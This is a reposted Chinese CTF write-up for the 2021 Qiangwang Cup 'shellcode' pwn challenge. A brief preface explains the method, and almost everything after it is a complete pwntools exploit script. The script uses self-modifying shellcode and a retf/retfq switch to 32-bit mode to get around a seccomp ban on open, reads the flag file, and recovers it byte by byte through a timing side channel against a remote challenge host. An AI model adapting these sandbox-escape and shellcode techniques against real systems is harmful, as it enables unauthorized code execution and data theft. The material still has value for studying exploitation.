强网杯2021CTF 强网先锋shellcode侧信道攻击复现
生活随笔
收集整理的這篇文章主要介紹了
强网杯2021CTF 强网先锋shellcode侧信道攻击复现
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
前言:由于個別原因這個比賽忘記參加了,所以賽后挑選了一道測信道攻擊的題來進行復現,這個題開啟了沙盒,采用測信道爆破flag,大概思路:使用retf切換到32位open來進行open('./flag'),retfq再回到64位的write和read就可以了,此題禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具體代碼分析,懂匯編就能看懂這里就不贅述了,參考了別的大佬的exp,大概就是這樣寫的,至于系統調用號可以參考前篇調用號文章
exp:
from pwn import * elf=ELF('./shellcode')def pwn(io,idx,ch):append_x86 = '''push ebxpop ebx'''shellcode_x86 = '''/*fp = open("flag")*/mov esp,0x40404140push 0x67616c66push esppop ebxxor ecx,ecxmov eax,5int 0x80mov ecx,eax'''shellcode_flag = '''push 0x33push 0x40404089retfq/*read(fp,buf,0x70)*/mov rdi,rcxmov rsi,rspmov rdx,0x70xor rax,raxsyscall'''if index == 0:shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-3;ret".format(index,ch)else:shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-4;ret".format(index,ch)shellcode_x86 = asm(shellcode_x86)shellcode_flag = asm(shellcode_flag,arch = 'amd64',os = 'linux')shellcode = ''append = '''push rdxpop rdx'''shellcode_mmap = '''/*mmap(0x40404040,0x7e,7,34,0,0)*/push 0x40404040 /*set rdi*/pop rdipush 0x7e /*set rsi*/pop rsipush 0x40 /*set rdx*/pop raxxor al,0x47push raxpop rdxpush 0x40 /*set r8*/pop raxxor al,0x40push raxpop r8push rax /*set r9*/pop r9/*syscall*/push rbxpop raxpush 0x5dpop rcxxor byte ptr[rax+0x31],clpush 0x5fpop rcxxor byte ptr[rax+0x32],clpush 0x22 /*set rcx*/pop rcxpush 0x40/*set rax*/pop raxxor al,0x49'''shellcode_read = '''/*read(0,0x40404040,0x70)*/push 0x40404040pop rsipush 0x40pop raxxor al,0x40push raxpop rdixor al,0x40push 0x70pop rdxpush rbxpop raxpush 0x5dpop rcxxor byte ptr[rax+0x57],clpush 0x5fpop rcxxor byte ptr[rax+0x58],clpush rdxpop raxxor al,0x70'''shellcode_retfq = '''push rbxpop raxxor al,0x40push 0x72pop rcxxor byte ptr[rax+0x40],clpush 0x68pop rcxxor byte ptr[rax+0x40],clpush 0x47pop rcxsub byte ptr[rax+0x41],clpush 0x48pop rcxsub byte ptr[rax+0x41],clpush rdipush rdipush 0x23push 0x40404040pop raxpush rax'''shellcode += shellcode_mmapshellcode += appendshellcode += shellcode_readshellcode += appendshellcode += shellcode_retfqshellcode += appendshellcode = asm(shellcode,arch = 'amd64',os = 'linux')print(hex(len(shellcode)))io.sendline(shellcode)sleep(0.5)io.sendline(shellcode_x86 + 0x29*b'\x90' + shellcode_flag) index = 0 a=[] while True:for ch in range(0x20,127):#io=process('./chall')io=remote('39.105.137.118',50050)pwn(io,index,ch)start = time.time()try:io.recv(timeout=2)print("".join([chr(i) for i in a]))except:passend=time.time()io.close()if end-start>1.5:a.append(ch)print("".join([chr(i) for i in a]))breakelse:print("".join([chr(i) for i in a]))breakindex = index + 1 print("".join([chr(i) for i in a]))總結:學到了測信道爆破flag
總結
以上是生活随笔為你收集整理的强网杯2021CTF 强网先锋shellcode侧信道攻击复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: centos7安装tree命令
- 下一篇: 如何正确使用Excel中颜色以及代码含义